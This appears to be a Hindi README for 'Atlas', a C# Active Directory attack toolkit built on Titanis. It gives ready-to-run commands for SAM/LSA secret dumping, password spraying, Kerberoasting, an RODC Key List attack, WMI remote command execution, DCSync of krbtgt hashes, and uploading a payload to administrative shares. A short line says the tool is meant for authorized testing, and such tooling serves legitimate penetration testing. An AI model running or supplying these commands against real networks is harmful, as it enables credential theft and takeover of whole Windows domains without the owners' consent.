
क्रॉस-प्लेटफ़ॉर्म नेटवर्क निष्पादन टूलकिट (SMB/Kerberos/WMI/LDAP/DCSync) जो TrustedSec के Titanis पर आधारित है - C# में NetExec-शैली वर्कफ़्लो
एटलस TrustedSec के Titanis प्रोटोकॉल लाइब्रेरी पर निर्मित एक क्रॉस-प्लेटफ़ॉर्म (Windows/Linux) नेटवर्क निष्पादन और सुरक्षा मूल्यांकन टूलकिट है। यह NetExec/CrackMapExec के कार्यप्रवाह से प्रेरित है: लक्ष्य सूचियाँ, क्रेडेंशियल सेट, मॉड्यूलर एन्यूमरेशन, और संक्षिप्त [HH:mm:ss] [+] host - message कंसोल आउटपुट।
यह टूल अधिकृत सुरक्षा परीक्षण के लिए है। केवल उन सिस्टमों के विरुद्ध उपयोग करें जिनके परीक्षण की आपके पास स्पष्ट अनुमति है।
| प्रोटोकॉल | क्षमताएँ |
|---|---|
smb | प्रमाणीकरण जाँच (NTLM/Kerberos/anonymous), शेयर, उपयोगकर्ता, समूह, डिस्क, SRVS/SAMR RPC के माध्यम से सत्र; रिमोट रजिस्ट्री के माध्यम से SAM और LSA सीक्रेट डंपिंग; SMB2/3 पर निर्देशिका सूची, get/put/mkdir/rm |
kerberos | उपयोगकर्ता एन्यूमरेशन (AS-REQ वर्गीकरण), प्री-ऑथ / AS-REP रोस्टेबल पहचान, hashcat-प्रारूप आउटपुट के साथ केरबेरोस्टिंग, RODC के विरुद्ध Key List हमला |
wmi | DCOM/WMI के माध्यम से प्रमाणीकरण जाँच, Win32_Process.Create के माध्यम से रिमोट कमांड निष्पादन |
ldap | प्रमाणीकरण जाँच (SASL या RFC 4511 सिंपल बाइंड), विशेषता चयन के साथ पेजेड सबट्री क्वेरी |
dcsync | [MS-DRSR] (IDL_DRSGetNCChanges + EXOP_REPL_OBJ) के माध्यम से DC से क्रेडेंशियल सामग्री की प्रतिकृति |
सभी प्रोटोकॉल में साझा:
a.b.c.d-e), कॉमा सूचियाँ, @file.kirbi/.ccache टिकट, PKINIT प्रमाणपत्र, S4U, SPN ओवरराइड, SOCKS5रिपॉजिटरी external/Titanis के अंतर्गत Titanis स्रोत को वेंडर करती है और इसे समाधान के भाग के रूप में बनाती है।
git clone https://github.com/<your-account>/atlas.git
cd atlas
dotnet build Atlas.sln -p:NoWarn=CS1998
परिणामी बाइनरी एक फ्रेमवर्क-निर्भर .NET एप्लिकेशन है:
dotnet src/Atlas.Cli/bin/Debug/net8.0/atlas.dll --help
atlas <protocol> <targets> [authentication] [actions] [options]
लक्ष्य विनिर्देश किसी भी मिश्रण को स्वीकार करता है: HOST, 10.0.0.5, 192.168.1.0/24, 10.0.0.1-64, कॉमा-पृथक सूचियाँ, या @targets.txt।
# केवल क्रेडेंशियल जाँच
atlas smb 10.0.0.5 -u administrator -p 'Password1!'
# एन्यूमरेशन
atlas smb 10.0.0.0/24 -u admin -p 'Password1!' -Shares -Users -Groups -Disks -Sessions
# SAM / LSA डंपिंग (स्थानीय व्यवस्थापक की आवश्यकता है)
atlas smb 10.0.0.5 -u admin -p 'Password1!' -Sam -Lsa
# फ़ाइल संचालन
atlas smb 10.0.0.5 -u admin -p pass -LsPath 'C$\Users'
atlas smb 10.0.0.5 -u admin -p pass -GetFile 'C$\Windows\win.ini'
atlas smb 10.0.0.5 -u admin -p pass -PutSource ./payload.bin -PutDest 'C$\Temp\payload.bin'
# मॉड्यूल
atlas smb 10.0.0.0/24 -u admin -p pass -M spider -mo 'depth=3,maxfiles=50,match=.conf'
atlas smb 10.0.0.0/24 -u admin -p pass -M shareaccess
atlas smb 10.0.0.5 -u admin -p pass -M localadmins
# पासवर्ड स्प्रे
atlas smb 10.0.0.0/24 -UserList users.txt -PassList 'Password1!,Summer2024!'
# उपयोगकर्ता एन्यूमरेशन (कोई क्रेडेंशियल आवश्यक नहीं)
atlas kerberos dc01.corp.local -d CORP.LOCAL -UserList users.txt
# केरबेरोस्टिंग (किसी भी डोमेन क्रेडेंशियल की आवश्यकता है)
atlas kerberos dc01.corp.local -d CORP.LOCAL -Roast -u lowpriv -p 'Password1!'
atlas kerberos dc01.corp.local -d CORP.LOCAL -Roast -u lowpriv -p pass -SpnList 'MSSQLSvc/sql01.corp.local:1433'
# RODC के विरुद्ध Key List हमला
atlas kerberos rodc01.corp.local -d CORP.LOCAL -rodcNo 20000 -rodcKey <aes256-hex> -UserList 'jdoe:1104'
atlas wmi dc01.corp.local -d CORP.LOCAL -u admin -p pass # प्रमाणीकरण जाँच
atlas wmi dc01.corp.local -d CORP.LOCAL -u admin -p pass -x whoami # निष्पादन
# SASL (NTLM/Kerberos) बाइंड - Active Directory के विरुद्ध विशिष्ट
atlas ldap dc01.corp.local -d CORP.LOCAL -u user -p pass -Query '(adminCount=1)' -Attrs sAMAccountName
# RFC 4511 सिंपल बाइंड - OpenLDAP के विरुद्ध विशिष्ट
atlas ldap ldap.example.com -bd 'cn=admin,dc=example,dc=com' -bp password \
-Query '(objectClass=*)' -Base 'dc=example,dc=com'
atlas dcsync dc01.corp.local -d CORP.LOCAL -u admin -p pass krbtgt
atlas dcsync dc01.corp.local -d CORP.LOCAL -u admin -p pass jdoe '(adminCount=1)'
पूर्ण पैरामीटर संदर्भ के लिए atlas <protocol> -h चलाएँ।
Atlas.sln
Directory.Build.props जानबूझकर no-op (नोट देखें)
src/
Atlas.props साझा बिल्ड सेटिंग्स (Atlas प्रोजेक्ट्स द्वारा स्पष्ट रूप से आयातित)
Atlas.Core/ लक्ष्य पार्सिंग, कंसोल आउटपुट, मॉड्यूल रजिस्ट्री
Atlas.Protocols.Smb/ SMB होस्ट + मॉड्यूल
Atlas.Protocols.Kerberos/ AS-REQ एन्यूमरेशन, रोस्टिंग, Key List हमला
Atlas.Protocols.Wmi/ WMI/DCOM होस्ट
Atlas.Protocols.Ldap/ LDAP होस्ट
Atlas.Protocols.Drsr/ DCSync
Atlas.Cli/ प्रवेश बिंदु / प्रोटोकॉल डिस्पैचर
external/Titanis/ वेंडर किया गया Titanis स्रोत (स्रोत से निर्मित; NuGet पर नहीं)
नोट: रिपॉजिटरी रूट पर
Directory.Build.propsजानबूझकर खाली है। Titanis का बिल्ड$(SolutionDir)Directory.Build.propsआयात करता है; इस समाधान से बिल्ड करते समय फ़ाइल का अस्तित्व होना चाहिए लेकिन खाली रहना चाहिए ताकि अपस्ट्रीम सेटिंग्स वेंडर किए गए ट्री में लीक न हों।
यह प्रोजेक्ट TrustedSec के Titanis से स्रोत को लिंक और वितरित करता है, जो GPL-3.0 के तहत लाइसेंस प्राप्त है। तदनुसार, यह प्रोजेक्ट GPL-3.0 के तहत वितरित किया गया है। external/Titanis/LICENSE देखें।
| मॉड्यूल | प्रोटोकॉल | विवरण |
|---|
spider | smb | रिकर्सिव शेयर क्रॉलर (depth, maxfiles, match विकल्प) |
shareaccess | smb | प्रति-शेयर READ/WRITE एक्सेस जाँच |
localadmins | smb | SAMR के माध्यम से स्थानीय Administrators समूह सदस्य, LSA के माध्यम से नाम हल किए गए |
| विकल्प | अर्थ |
|---|
-u, -UserName | उपयोगकर्ता नाम (user, DOMAIN\user, या user@realm) |
-p, -Password | पासवर्ड |
-NtlmHash | NT हैश (NTLM + Kerberos RC4) |
-AesKey | AES128/AES256 Kerberos कुंजी |
-Kdc | Kerberos के लिए KDC एंडपॉइंट |
-Tgt / -TicketCache / -Tickets | .kirbi / .ccache टिकट इनपुट |
-Keytab | keytab फ़ाइल |
-UserCert (+-UserKey) | PKINIT प्रमाणपत्र प्रमाणीकरण |
-Anonymous | नल सत्र |
-ha | होस्ट पता ओवरराइड (सही SPN के लिए लक्ष्य स्थिति में FQDN + यहाँ IP का उपयोग करें) |